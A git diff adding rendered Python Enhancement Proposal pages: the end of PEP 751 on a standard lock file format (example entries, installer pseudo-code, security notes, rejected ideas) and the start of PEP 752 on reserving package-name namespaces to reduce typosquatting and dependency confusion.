+  { tags = ['py3-none-any'], url = 'https://files.pythonhosted.org/packages/6a/21/5b6702a7f963e95456c0de2d495f67bf5fd62840ac655dc451586d23d39a/attrs-24.2.0-py3-none-any.whl', hash = '81921eb96de3191c8258c199618104dd27ac608d9366f5e35d011eae1867ede2', upload_time = 2024-08-06T14:37:36.958006+00:00, size = 63001 }
+]
+
+[[packages]]
+name = 'cattrs'
+version = '24.1.2'
+groups = ['Default']
+index_url = 'https://pypi.org/simple/cattrs'
+direct = false
+requires_python = '>=3.8'
+dependencies = [
+  { name = 'attrs', version = '>=23.1.0' },
+  { name = 'exceptiongroup', version = '>=1.1.1', marker = 'python_version < "3.11"' },
+  { name = 'typing-extensions', version = '!=4.6.3,>=4.1.0', marker = 'python_version < "3.11"' },
+  { name = 'pymongo', version = '>=4.4.0', feature = 'bson' },
+  { name = 'cbor2', version = '>=5.4.6', feature = 'cbor2' },
+  { name = 'msgpack', version = '>=1.0.5', feature = 'msgpack' },
+  { name = 'msgspec', version = '>=0.18.5', marker = 'implementation_name == "cpython"', feature = 'msgspec' },
+  { name = 'orjson', version = '>=3.9.2', marker = 'implementation_name == "cpython"', feature = 'orjson' },
+  { name = 'pyyaml', version = '>=6.0', feature = 'pyyaml' },
+  { name = 'tomlkit', version = '>=0.11.8', feature = 'tomlkit' },
+  { name = 'ujson', version = '>=5.7.0', feature = 'ujson' }
+]
+editable = false
+wheels = [
+  { tags = ['py3-none-any'], url = 'https://files.pythonhosted.org/packages/c8/d5/867e75361fc45f6de75fe277dd085627a9db5ebb511a87f27dc1396b5351/cattrs-24.1.2-py3-none-any.whl', hash = '67c7495b760168d931a10233f979b28dc04daf853b30752246f4f8471c6d68d0', upload_time = 2024-09-22T14:58:34.812643+00:00, size = 66446 }
+]
+
+[[packages]]
+name = 'numpy'
+version = '2.1.2'
+groups = ['Default']
+index_url = 'https://pypi.org/simple/numpy'
+direct = false
+requires_python = '>=3.10'
+dependencies = [
+
+]
+editable = false
+wheels = [
+  { tags = ['cp312-cp312-manylinux2014_x86_64', 'cp312-cp312-manylinux_2_17_x86_64'], url = 'https://files.pythonhosted.org/packages/9b/b4/e3c7e6fab0f77fff6194afa173d1f2342073d91b1d3b4b30b17c3fb4407a/numpy-2.1.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl', hash = '6d95f286b8244b3649b477ac066c6906fbb2905f8ac19b170e2175d3d799f4df', upload_time = 2024-10-05T18:36:20.729642+00:00, size = 16041825 },
+  { tags = ['cp312-cp312-win_amd64'], url = 'https://files.pythonhosted.org/packages/4c/79/73735a6a5dad6059c085f240a4e74c9270feccd2bc66e4d31b5ca01d329c/numpy-2.1.2-cp312-cp312-win_amd64.whl', hash = '456e3b11cb79ac9946c822a56346ec80275eaf2950314b249b512896c0d2505e', upload_time = 2024-10-05T18:37:38.159022+00:00, size = 12568254 }
+]
+
+
+
+
+

Expectations for Lockers

+
    +
  • Lockers MUST make sure that entering the dependency graph via a specific group +will not lead to ambiguity for installers as to which value in +[[packages]] to install for any environment (this can be controlled for +via packages.version and packages.groups).
  • +
  • Lockers SHOULD try to make all logically related groups resolve together +(i.e. no ambiguity if grouped together).
  • +
  • If a groups.project would have extras that cause ambiguity or installation +failure due to conflicts between the extras, the locker MAY create +separate groups.requirements entries instead, otherwise the locker MUST +raise an error.
  • +
  • Lockers MAY try to lock for multiple environments in a single lock file.
  • +
  • Lockers MAY try to update a lock file containing [tool] and +[packages.tool] for other tools than themselves.
  • +
  • Lockers MAY want to provide a way to let users provide the information +necessary to lock for other environments, e.g., supporting a JSON +file format which specifies wheel tags and marker values.
  • +
+
{
+    "marker-values": {"<marker>": "<value>"},
+    "wheel-tags": ["<tag>"]
+}
+
+
+
+
+

Expectations for Installers

+
    +
  • Installers MAY support installation of non-binary files +(i.e. source trees and source distributions), but are not required to.
  • +
  • Installers MUST provide a way to avoid non-binary file installation for +reproducibility and security purposes.
  • +
  • Installers SHOULD make it opt-in to use non-binary file installation to +facilitate a secure-by-default approach.
  • +
  • If a traversal of the graph leads to any ambiguity as to what package version +to install (i.e. more than one package version qualifies), an error MUST be +raised.
  • +
  • Installers MUST only consider package versions included in any selected +groups (i.e. installers cannot consider packages outside of the groups +selected to install from).
  • +
  • Installers MUST error out if a package version lacks a way to install into the +chosen environment.
  • +
  • Installers MUST support installing into an empty environment.
  • +
+
+

Pseudo-Code

+
class UnsatisfiableError(Exception):
+    """Raised when a requirement cannot be satisfied."""
+
+
+class AmbiguityError(Exception):
+    """Raised when a requirement has multiple solutions."""
+
+
+def install_packages(lock_file_contents):
+    # Hard-coded out of laziness.
+    packages = choose_packages(lock_file_contents, (GROUP_NAME, frozenset()))
+
+    for package in packages:
+        tags = list(packaging.tags.sys_tags())
+        for tag in tags:  # Prioritize by tag order.
+            tag_str = str(tag)
+            for wheel in package["wheels"]:
+                if tag_str in wheel["tags"]:
+                    break
+            else:
+                continue
+            break
+        else:
+            raise UnsatisfiableError(
+                f"No wheel for {package['name']} {package['version']}"
+            )
+        print(f"Installing {package['name']} {package['version']} ({tag_str})")
+
+
+def choose_packages(lock_file_data, *selected_groups):
+    """Select the package versions that should be installed based on the requested groups.
+
+    'selected_groups' is a sequence of two-item tuples, representing a group name and
+    optionally any requested extras if the group is a project.
+    """
+    group_names = frozenset(operator.itemgetter(0)(group) for group in selected_groups)
+    available_packages = {}  # The packages in the selected groups.
+    for pkg in lock_file_data["packages"]:
+        if frozenset(pkg["groups"]) & group_names:
+            available_packages.setdefault(pkg["name"], []).append(pkg)
+    selected_packages = {}  # The package versions that have been selected.
+    handled_extras = {}  # The extras that have been handled.
+    requirements = []  # A stack of requirements to satisfy.
+
+    # First, get our starting list of requirements.
+    for group in selected_groups:
+        requirements.extend(gather_requirements(lock_file_data, group))
+
+    # Next, go through the requirements and try to find a **single** package version
+    # that satisfies each requirement.
+    while requirements:
+        req = requirements.pop()
+        # Ignore requirements whose markers disqualify it.
+        if not applies_to_env(req):
+            continue
+        name = req["name"]
+        if pkg := selected_packages.get(name):
+            # Safety check that the cross-section of groups doesn't cause issues.
+            # It somewhat assumes the locker didn't mess up such that there would be
+            # ambiguity by what package version was initially selected.
+            if not version_satisfies(req, pkg):
+                raise UnsatisfiableError(
+                    f"requirement {req!r} not satisfied by "
+                    f"{selected_packages[req['name']]!r}"
+                )
+            if "extras" not in req:
+                continue
+            needed_extras = req["extras"]
+            if not (extras := handled_extras.set_default(name, set())).difference(
+                needed_extras
+            ):
+                continue
+            # This isn't optimal as we may tread over the same extras multiple times,
+            # but eventually the maximum set of extras for the package will be handled
+            # and thus the above guard will short-circuit adding any more requirements.
+            extras.update(needed_extras)
+        else:
+            # Raises UnsatisfiableError or AmbiguityError if no suitable, single package
+            # version is found.
+            pkg = compatible_package_version(req, available_packages[req["name"]])
+            selected_packages[name] = pkg
+        requirements.extend(dependencies(pkg, req))
+
+    return selected_packages.values()
+
+
+def gather_requirements(locked_file_data, group):
+    """Return a collection of all requirements for a group."""
+    # Hard-coded to support `groups.requirements` out of laziness.
+    group_name, _extras = group
+    for group in locked_file_data["groups"]:
+        if group["name"] == group_name:
+            return group["requirements"]
+    else:
+        raise ValueError(f"Group {group_name!r} not found in lock file")
+
+
+def applies_to_env(requirement):
+    """Check if the requirement applies to the current environment."""
+    try:
+        markers = requirement["marker"]
+    except KeyError:
+        return True
+    else:
+        return packaging.markers.Marker(markers).evaluate()
+
+
+def version_satisfies(requirement, package):
+    """Check if the package version satisfies the requirement."""
+    try:
+        raw_specifier = requirement["version"]
+    except KeyError:
+        return True
+    else:
+        specifier = packaging.specifiers.SpecifierSet(raw_specifier)
+        return specifier.contains(package["version"], prereleases=True)
+
+
+def compatible_package_version(requirement, available_packages):
+    """Return the package version that satisfies the requirement.
+
+    If no package version can satisfy the requirement, raise UnsatisfiableError. If
+    multiple package versions can satisfy the requirement, raise AmbiguityError.
+    """
+    possible_packages = [
+        pkg for pkg in available_packages if version_satisfies(requirement, pkg)
+    ]
+    if not possible_packages:
+        raise UnsatisfiableError(f"No package version satisfies {requirement!r}")
+    elif len(possible_packages) > 1:
+        raise AmbiguityError(f"Multiple package versions satisfy {requirement!r}")
+    return possible_packages[0]
+
+
+def dependencies(package, requirement):
+    """Return the dependencies of the package.
+
+    The extras from the requirement will extend the base requirements as needed.
+    """
+    applicable_deps = []
+    extras = frozenset(requirement.get("extras", []))
+    for dep in package["dependencies"]:
+        if "feature" not in dep or dep["feature"] in extras:
+            applicable_deps.append(dep)
+    return applicable_deps
+
+
+
+
+
+
+

Backwards Compatibility

+

Because there is no preexisting lock file format, there are no explicit +backwards-compatibility concerns in terms of Python packaging standards.

+

As for packaging tools themselves, that will be a per-tool decision. For tools +that don’t document their lock file format, they could choose to simply start +using the format internally and then transition to saving their lock files with +a name supported by this PEP. For tools with a preexisting, documented format, +they could provide an option to choose which format to emit.

+
+
+

Security Implications

+

The hope is that by standardizing on a lock file format that starts from a +security-first posture it will help make overall packaging installation safer. +However, this PEP does not solve all potential security concerns.

+

One potential concern is tampering with a lock file. If a lock file is not kept +in source control and properly audited, a bad actor could change the file in +nefarious ways (e.g. point to a malware version of a package). Tampering could +also occur in transit to e.g. a cloud provider who will perform an installation +on the user’s behalf. Both could be mitigated by signing the lock file either +within the file in a [tool] entry or via a side channel external to the lock +file itself.

+

This PEP does not do anything to prevent a user from installing an incorrect +packages. While including many details to help in auditing a package’s inclusion, +there isn’t any mechanism to stop e.g. name confusion attacks via typosquatting. +Lockers may be able to provide some UX to help with this (e.g. by providing +download counts for a package).

+
+
+

How to Teach This

+

Users should be informed that when they ask to install some package, that +package may have its own dependencies, those dependencies may have dependencies, +and so on. Without writing down what gets installed as part of installing the +package they requested, things could change from underneath them (e.g., package +versions). Changes to the underlying dependencies can lead to accidental +breakage of their code. Lock files help deal with that by providing a way to +write down what was (and should be) installed.

+

Having what to install written down also helps in collaborating with others. By +agreeing to a lock file’s contents, everyone ends up with the same packages +installed. This helps make sure no one relies on e.g. an API that’s only +available in a certain version that not everyone working on the project has +installed.

+

Lock files also help with security by making sure you always get the same files +installed and not a malicious one that someone may have slipped in. It also +lets one be more deliberate in upgrading their dependencies and thus making sure +the change is on purpose and not one slipped in by a bad actor.

+
+
+

Reference Implementation

+

A proof-of-concept implementing most of this PEP for wheels can be found at +https://github.com/brettcannon/mousebender/tree/pep .

+
+
+

Rejected Ideas

+
+

A flat set of packages to install

+

An earlier version of this PEP proposed to use a flat set of package versions +instead of a graph. The idea was that each package version could be evaluated in +isolation as to whether it applied to an environment for installation. The hope +was that would lend itself to easier auditing as one wouldn’t have to worry +about how a package version fit into the graph when looking at e.g., a diff for +a lock file.

+

Unfortunately this was deemed not as flexible as using a graph. For instance, +recording the graph +assists in dependency analysis for tools like GitHub. +A graph also makes following how you ended up with dependencies within your lock +file from any point in the graph. It also balances out the implementation costs +a bit more between lockers and installers by alleviating the complexity off of +lockers a bit for only a minor increase in complexity for installers by +involving standard graph-traversing algorithms instead of a linear walk.

+

And if the dependency graph is already being recorded for the above benefits, +then recording that same data in a flattened manner is redundant that makes +lock files larger and potentially more unruly.

+
+
+

Specifying a new core metadata version that requires consistent metadata across files

+

At one point, to handle the issue of metadata varying between files and thus +require examining every released file for a package and version for accurate +locking results, the idea was floated to introduce a new core metadata version +which would require all metadata for all wheel files be the same for a single +version of a packages. Ultimately, though, it was deemed unnecessary as this PEP +will put pressure on people to make files consistent for performance reasons or +to make indexes provide all the metadata separate from the wheel files +themselves. As well, there’s no easy enforcement mechanism, and so community +expectation would work as well as a new metadata version.

+
+
+

Have the installer do dependency resolution

+

In order to support a format more akin to how Poetry worked when this PEP was +drafted, it was suggested that lockers effectively record the packages and their +versions which may be necessary to make an install work in any possible +scenario, and then the installer resolves what to install. But that complicates +auditing a lock file by requiring much more mental effort to know what packages +may be installed in any given scenario. Also, one of the Poetry developers +suggested +that markers as represented in the package locking approach of this PEP may be +sufficient to cover the needs of Poetry. Not having the installer do a +resolution also simplifies their implementation, centralizing complexity in +lockers.

+
+
+

Requiring specific hash algorithm support

+

It was proposed to require a baseline hash algorithm for the files. This was +rejected as no other Python packaging specification requires specific hash +algorithm support. As well, the minimum hash algorithm suggested may eventually +become an outdated/unsafe suggestion, requiring further updates. In order to +promote using the best algorithm at all times, no baseline is provided to avoid +simply defaulting to the baseline in tools without considering the security +ramifications of that hash algorithm.

+
+
+

Require a URL or file path for files

+

Originally references to files were required, e.g., packages.sdist.url or +packages.sdist.path. But at least +one use-case +surfaced during discussions about this PEP where statically specifying the +location of files would be problematic. And in earlier discussions the idea of +the location being a hint wasn’t preferred. Hence the PEP now makes the data +optional, but considers the locations accurate if specified.

+
+
+

File naming

+
+

Using *.pylock.toml as the file name

+

It was proposed to put the pylock constant part of the file name after the +identifier for the purpose of the lock file. It was decided not to do this so +that lock files would sort together when looking at directory contents instead +of purely based on their purpose which could spread them out in a directory.

+
+
+

Using *.pylock as the file name

+

Not using .toml as the file extension and instead making it .pylock +itself was proposed. This was decided against so that code editors would know +how to provide syntax highlighting to a lock file without having special +knowledge about the file extension.

+
+
+

Not having a naming convention for the file

+

Having no requirements or guidance for a lock file’s name was considered, but +ultimately rejected. By having a standardized naming convention it makes it easy +to identify a lock file for both a human and a code editor. This helps +facilitate discovery when e.g. a tool wants to know all of the lock files that +are available.

+
+
+
+

File format

+
+

Use JSON over TOML

+

Since having a format that is machine-writable was a goal of this PEP, it was +suggested to use JSON. But it was deemed less human-readable than TOML while +not improving on the machine-writable aspect enough to warrant the change.

+
+
+

Use YAML over TOML

+

Some argued that YAML met the machine-writable/human-readable requirement in a +better way than TOML. But as that’s subjective and pyproject.toml already +existed as the human-writable file used by Python packaging standards it was +deemed more important to keep using TOML.

+
+
+
+

Other keys

+
+

Multiple hashes per file

+

An initial version of this PEP proposed supporting multiple hashes per file. The +idea was to allow one to choose which hashing algorithm they wanted to go with +when installing. But upon reflection it seemed like an unnecessary complication +as there was no guarantee the hashes provided would satisfy the user’s needs. +As well, if the single hash algorithm used in the lock file wasn’t sufficient, +rehashing the files involved as a way to migrate to a different algorithm didn’t +seem insurmountable.

+
+
+

Hashing the contents of the lock file itself

+

Hashing the contents of the bytes of the file and storing hash value within the +file itself was proposed at some point. This was removed to make it easier +when merging changes to the lock file as each merge would have to recalculate +the hash value to avoid a merge conflict.

+

Hashing the semantic contents of the file was also proposed, but it would lead +to the same merge conflict issue.

+

Regardless of which contents were hashed, either approach could have the hash +value stored outside of the file if such a hash was desired.

+
+
+

Recording the creation date of the lock file

+

To know how potentially stale the lock file was, an earlier proposal suggested +recording the creation date of the lock file. But for some same merge conflict +reasons as storing the hash of the file contents, this idea was dropped.

+
+
+

Recording the package indexes used

+

Recording what package indexes were used by the locker to decide what to lock +for was considered. In the end, though, it was rejected as it was deemed +unnecessary bookkeeping.

+
+
+

Locking build requirements for sdists

+

An earlier version of this PEP tried to lock the build requirements for sdists +under a packages.build-requires key. Unfortunately it confused enough people +about how it was expected to operate and there were enough edge case issues to +decide it wasn’t worth trying to do in this PEP upfront. Instead, a future PEP +could propose a solution.

+
+
+
+
+

Open Issues

+
+

Specify requires-python at the file level?

+

The lock file formats from PDM, Poetry, and uv all specify +requires-python at the top level for the absolute minimum Python version +needed for the lock file. This can be inferred, though, by examining all +packages.requires-python values. The global value might also not be +accurate for all platforms depending on how environment markers influence what +package versions are installed and what their Python version requirements are.

+
+
+

Don’t pre-parse data?

+

This PEP currently takes the viewpoint that if a piece of data is going to be +parsed by installers everytime they run, then trying to pre-parse as much as +possible so the TOML parser can help is a good thing. The thinking is TOML +parsers have a higher chance of being optimized, and so letting them do more +parsing leads to a faster outcome. It should also increase readability by +breaking apart data upfront more.

+

But in the case of doing this to wheel file names, some might consider it too +much. The question becomes whether separating out all the parts of a wheel +file name hinders readability because people are used to reading the file names +already, or by clearly separating its parts it actually helps make installers +faster, easier to write, and doesn’t hinder readability.

+

This all equally applies to requirement specifiers.

+
+
+
+

Deferred Ideas

+
+

Per-file locking

+

An earlier version of this PEP supported two approaches to locking: per-file +and per-package. The idea for the former approach to locking was that if you +were locking for an a-priori set of environments you could lock to just the +files necessary to install into those environments. The thinking was that by +only listing a subset of files that auditing would be easier.

+

Unfortunately there was disagreement on how best to express upfront what the +supported environment requirements would be. Since what this PEP currently +proposes still prevents accidental success of installation into unsupported +environments, this idea has been deferred until such time someone can come up +with a representation that makes sense.

+
+
+

Allowing for multiple lock files

+

Before the introduction of [[groups]], this PEP proposed supporting multiple +lock files that would match the regular expression +r"pylock\.(.+)\.toml" if a name for the lock file is desired or if multiple +lock files exist. But since [[groups]] subsumes a lot of the need to support +multiple lock files, this specific feature can be postponed until such time that +a need is shown to support multiple lock files.

+
+
+
+

Acknowledgements

+

Thanks to everyone who participated in the discussions on discuss.python.org. +Also thanks to Randy Döring, Seth Michael Larson, Paul Moore, and Ofek Lev for +providing feedback on a draft version of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0751.rst

+

Last modified: 2024-11-05 19:18:47 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0752/index.html b/pep-0752/index.html new file mode 100644 index 00000000000..ff1bfa007a6 --- /dev/null +++ b/pep-0752/index.html @@ -0,0 +1,842 @@ + + + + + + + + PEP 752 – Implicit namespaces for package repositories | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 752 – Implicit namespaces for package repositories

+
+
Author:
+
Ofek Lev <ofekmeister at gmail.com>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Dustin Ingram <di at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
13-Aug-2024
+
Post-History:
+
18-Aug-2024, +07-Sep-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies a way for organizations to reserve package name prefixes +for future uploads.

+
+
“Namespaces are one honking great idea – let’s do more of +those!” - PEP 20
+
+
+

Motivation

+

The current ecosystem lacks a way for projects with many packages to signal a +verified pattern of ownership. Such projects fall into two categories.

+

The first category is projects [1] that want complete control over their +namespace. A few examples:

+
    +
  • Major cloud providers like Amazon, Google and Microsoft have a common prefix +for each feature’s corresponding package [3]. For example, most of Google’s +packages are prefixed by google-cloud- e.g. google-cloud-compute for +using virtual machines.
  • +
  • OpenTelemetry is an open standard for +observability with official packages for the core APIs and SDK with +contrib packages to collect data from various sources. All packages +are prefixed by opentelemetry- with child prefixes in the form +opentelemetry-<component>-<name>-. The contrib packages live in a +central repository and they are the only ones with the ability to publish.
  • +
+

The second category is projects [2] that want to share their namespace such +that some packages are officially maintained and third-party developers are +encouraged to participate by publishing their own. Some examples:

+
    +
  • Project Jupyter is devoted to the development of +tooling for sharing interactive documents. They support extensions +which in most cases (and in all cases for officially maintained +extensions) are prefixed by jupyter-.
  • +
  • Django is one of the most widely used web +frameworks in existence. They have the concept of reusable apps, which +are commonly installed via +third-party packages that implement a subset +of functionality to extend Django-based websites. These packages are by +convention prefixed by django- or dj-.
  • +
+

Such projects are uniquely vulnerable to name-squatting attacks +which can ultimately result in dependency confusion.

+

For example, say a new product is released for which monitoring would be +valuable. It would be reasonable to assume that +Datadog would eventually support it as an +official integration. It takes a nontrivial amount of time to deliver such an +integration due to roadmap prioritization and the time required for +implementation. It would be impossible to reserve the name of every potential +package so in the interim an attacker may create a package that appears +legitimate which would execute malicious code at runtime. Not only are users +more likely to install such packages but doing so taints the perception of the +entire project.

+

Although PEP 708 attempts to address this attack vector, it is specifically +about the case of multiple repositories being considered during dependency +resolution and does not offer any protection to the aforementioned use cases.

+

Namespacing also would drastically reduce the incidence of +typosquatting +because typos would have to be in the prefix itself which is +normalized and likely to be a short, well-known identifier like +aws-. In recent years, typosquatting has become a popular attack vector +[4].

+

The current protection against typosquatting used by PyPI is to normalize +similar characters but that is insufficient for these use cases.

+
+
+

Rationale

+

Other package ecosystems have generally solved this problem by taking one of +two approaches: either minimizing or maximizing backwards compatibility.

+
    +
  • NPM has the concept of +scoped packages which were +introduced primarily to combat there being a dearth of available good +package names (whether a real or perceived phenomenon). When a user or +organization signs up they are given a scope that matches their name. For +example, the +package for using +Google Cloud Storage is @google-cloud/storage where @google-cloud/ is +the scope. Regular user accounts (non-organization) may publish unscoped +packages for public use. +This approach has the lowest amount of backwards compatibility because every +installer and tool has to be modified to account for scopes.
  • +
  • NuGet has the concept of +package ID prefix reservation which was +introduced primarily to satisfy users wishing to know where a package +came from. A package name prefix may be reserved for use by one or more +owners. Every reserved package has a special indication +on its page to +communicate this. After reservation, any upload with a reserved prefix will +fail if the user is not an owner of the prefix. Existing packages that have a +prefix that is owned may continue to release as usual. This approach has the +highest amount of backwards compatibility because only modifications to +indices like PyPI are required and installers do not need to change.
  • +
+

This PEP specifies the NuGet approach of authorized reservation across a flat +namespace. Any solution that requires new package syntax must be built atop the +existing flat namespace and therefore implicit namespaces acquired via a +reservation mechanism would be a prerequisite to such explicit namespaces.

+

Although existing packages matching a reserved namespace would be untouched, +preventing future unauthorized uploads and strategically applying PEP 541 +takedown requests for malicious cases would reduce risks to users to a +negligible level.

+
+
+

Terminology

+

The key words “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, +“SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this document are to be +interpreted as described in RFC 2119.

+
+
Organization
Organizations are entities that own projects and have various +users associated with them.
+
Grant
A grant is a reservation of a namespace for a package repository.
+
Open Namespace
An open namespace allows for uploads from any project +owner.
+
Restricted Namespace
A restricted namespace only allows uploads from an owner of the namespace.
+
Parent Namespace
A namespace’s parent refers to the namespace without the trailing +hyphenated component e.g. the parent of foo-bar is foo.
+
Child Namespace
A namespace’s child refers to the namespace with additional trailing +hyphenated components e.g. foo-bar is a valid child of foo as is +foo-bar-baz.
+
+
+
+

Specification

+
+

Organizations

+

Any package repository that allows for the creation of projects (e.g. +non-mirrors) MAY offer the concept of organizations. Organizations +are entities that own projects and have various users associated with them.

+

Organizations MAY reserve one or more namespaces. Such reservations neither +confer ownership nor grant special privileges to existing projects.

+
+
+

Naming

+

A namespace MUST be a valid project name and normalized internally e.g. +foo.bar would become foo-bar.

+
+
+

Semantics

+

A namespace grant bestows ownership over the following:

+
    +
  1. A project matching the namespace itself such as the placeholder package +microsoft.
  2. +
  3. Projects that start with the namespace followed by a hyphen. For example, +the namespace foo would match the normalized project name foo-bar +but not the project name foobar.
  4. +
+

Package name matching acts upon the normalized namespace.

+

Namespaces are per-package repository and SHALL NOT be shared between +repositories. For example, if PyPI has a namespace microsoft that is owned +by the company Microsoft, packages starting with microsoft- that come from +other non-PyPI mirror repositories do not confer the same level of trust.

+

Grants MUST NOT overlap. For example, if there is an existing grant +for foo-bar then a new grant for foo would be forbidden. An overlap is +determined by comparing the normalized proposed namespace with the +normalized namespace of every existing root grant. Every comparison must append +a hyphen to the end of the proposed and existing namespace. An overlap is +detected when any existing namespace starts with the proposed namespace.

+
+
+

Uploads

+

If the following criteria are all true for a given upload:

+
    +
  1. The project does not yet exist.
  2. +
  3. The name matches a reserved namespace.
  4. +
  5. The project is not owned by an organization with an active grant for the +namespace.
  6. +
+

Then the upload MUST fail with a 403 HTTP status code.

+
+
+

Open Namespaces

+

The owner of a grant may choose to allow others the ability to release new +projects with the associated namespace. Doing so MUST allow +uploads for new projects matching the namespace from any user.

+

It is possible for the owner of a namespace to both make it open and allow +other organizations to use the grant. In this case, the authorized +organizations have no special permissions and are equivalent to an open grant +without ownership.

+
+
+

Hidden Grants

+

Repositories MAY create hidden grants that are not visible to the public which +prevent their namespaces from being claimed by others. Such grants MUST NOT be +open and SHOULD NOT be exposed in the +API.

+

Hidden grants are useful for repositories that wish to enforce upload +restrictions without the need to expose the namespace to the public.

+
+
+

Repository Metadata

+

The JSON API version will be incremented from 1.2 to 1.3. +The following API changes MUST be implemented by repositories that support +this PEP. Repositories that do not support this PEP MUST NOT implement these +changes so that consumers of the API are able to determine whether the +repository supports this PEP.

+
+

Project Detail

+

The project detail response will be modified as +follows.

+

The namespace key MUST be null if the project does not match an active +namespace grant. If the project does match a namespace grant, the value MUST be +a mapping with the following keys:

+
    +
  • prefix: This is the associated normalized namespace e.g. +foo-bar. If the owner of the project owns multiple matching grants then +this MUST be the namespace with the most number of characters. For example, +if the project name matched both foo-bar and foo-bar-baz then this +key would be the latter.
  • +
  • authorized: This is a boolean and will be true if the project owner +is an organization and is one of the current owners of the grant. This is +useful for tools that wish to make a distinction between official and +community packages.
  • +
  • open: This is a boolean indicating whether the namespace is +open.
  • +
+
+
+

Namespace Detail

+

The format of this URL is /namespace/<namespace> where <namespace> is +the normalized namespace. For example, the URL for the namespace +foo.bar would be /namespace/foo-bar.

+

The response will be a mapping with the following keys:

+
    +
  • prefix: This is the normalized version of the namespace e.g. +foo-bar.
  • +
  • owner: This is the organization that is responsible for the namespace.
  • +
  • open: This is a boolean indicating whether the namespace is +open.
  • +
  • parent: This is the parent namespace if it exists. For example, if the +namespace is foo-bar and there is an active grant for foo, then this +would be "foo". If there is no parent then this key will be null.
  • +
  • children: This is an array of any child namespaces. For example, if the +namespace is foo and there are active grants for foo-bar and +foo-bar-baz then this would be ["foo-bar", "foo-bar-baz"].
  • +
+
+
+
+

Grant Removal

+

When a reserved namespace becomes unclaimed, repositories MUST set the +namespace key to null in the API.

+

Namespaces that were previously claimed but are now not SHOULD be eligible for +claiming again by any organization.

+
+
+
+

Community Buy-in

+

Representatives from the following organizations have expressed support for +this PEP (with a link to the discussion):

+ +
+
+

Backwards Compatibility

+

There are no intrinsic concerns because there is still a flat namespace and +installers need no modification. Additionally, many projects have already +chosen to signal a shared purpose with a prefix like typeshed has done.

+
+
+

Security Implications

+
    +
  • There is an opportunity to build on top of PEP 740 and PEP 480 so that +one could prove cryptographically that a specific release came from an owner +of the associated namespace. This PEP makes no effort to describe how this +will happen other than that work is planned for the future.
  • +
+
+
+

How to Teach This

+

For consumers of packages we will document how metadata is exposed in the +API and potentially in future note tooling that +supports utilizing namespaces to provide extra security guarantees during +installation.

+
+
+

Reference Implementation

+

None at this time.

+
+
+

Rejected Ideas

+
+

Artifact-level Namespace Association

+

An earlier version of this PEP proposed that metadata be associated with +individual artifacts at the point of release. This was rejected because it +had the potential to cause confusion for users who would expect the namespace +authorization guarantee to be at the project level based on current grants +rather than the time at which a given release occurred.

+
+
+

Organization Scoping

+

The primary motivation for this PEP is to reduce dependency confusion attacks +and NPM-style scoping with an allowance of the legacy flat namespace would +increase the risk. If documentation instructed a user to install bar in the +namespace foo then the user must be careful to install @foo/bar and not +foo-bar, or vice versa. The Python packaging ecosystem has normalization +rules for names in order to maximize the ease of communication and this would +be a regression.

+

The runtime environment of Python is also not conducive to scoping. Whereas +multiple versions of the same JavaScript package may coexist, Python only +allows a single global namespace. Barring major changes to the language itself, +this is nearly impossible to change. Additionally, users have come to expect +that the package name is usually the same as what they would import and +eliminating the flat namespace would do away with that convention.

+

Scoping would be particularly affected by organization changes which are bound +to happen over time. An organization may change their name due to internal +shuffling, an acquisition, or any other reason. Whenever this happens every +project they own would in effect be renamed which would cause unnecessary +confusion for users, frequently.

+

Finally, the disruption to the community would be massive because it would +require an update from every package manager, security scanner, IDE, etc. New +packages released with the scoping would be incompatible with older tools and +would cause confusion for users along with frustration from maintainers having +to triage such complaints.

+
+
+

Encourage Dedicated Package Repositories

+

Critically, this imposes a burden on projects to maintain their own infra. This +is an unrealistic expectation for the vast majority of companies and a complete +non-starter for community projects.

+

This does not help in most cases because the default behavior of most package +managers is to use PyPI so users attempting to perform a simple pip install +would already be vulnerable to malicious packages.

+

In this theoretical future every project must document how to add their +repository to dependency resolution, which would be different for each package +manager. Few package managers are able to download specific dependencies from +specific repositories and would require users to use verbose configuration in +the common case.

+

The ones that do not support this would instead find a given package using an +ordered enumeration of repositories, leading to dependency confusion. +For example, say a user wants two packages from two custom repositories X +and Y. If each repository has both packages but one is malicious on X +and the other is malicious on Y then the user would be unable to satisfy +their requirements without encountering a malicious package.

+
+
+

Exclusive Reliance on Provenance Assertions

+

The idea here [5] would be to design a general purpose way for clients to make +provenance assertions to verify certain properties of dependencies, each with +custom syntax. Some examples:

+
    +
  • The package was uploaded by a specific organization or user name e.g. +pip install "azure-loganalytics from microsoft"
  • +
  • The package was uploaded by an owner of a specific domain name e.g. +pip install "google-cloud-compute from cloud.google.com"
  • +
  • The package was uploaded by a user with a specific email address e.g. +pip install "aws-cdk-lib from contact@amazon.com"
  • +
  • The package matching a namespace was uploaded by an authorized party (this +PEP)
  • +
+

A fundamental downside is that it doesn’t play well with multiple +repositories. For example, say a user wants the azure-loganalytics package +and wants to ensure it comes from the organization named microsoft. If +Microsoft’s organization name on PyPI is microsoft then a package manager +that defaults to PyPI could accept azure-loganalytics from microsoft. +However, if multiple repositories are used for dependency resolution then the +user would have to specify the repository as part of the definition which is +unrealistic for reasons outlined in the dedicated section on +asserting package owner names.

+

Another general weakness with this approach is that a user attempting to +perform a simple pip install without special syntax, which is the most +common scenario, would already be vulnerable to malicious packages. In order to +overcome this there would have to be some default trust mechanism, which in all +cases would impose certain UX or resolver logic upon every tool.

+

For example, package managers could be changed such that the first time a +package is installed the user would receive a confirmation prompt displaying +the provenance details. This would be very confusing and noisy, especially for +new users, and would be a breaking UX change for existing users. Many methods +of installation wouldn’t work for this scenario such as running in CI or +installing from a requirements file where the user would potentially be getting +hundreds of prompts.

+

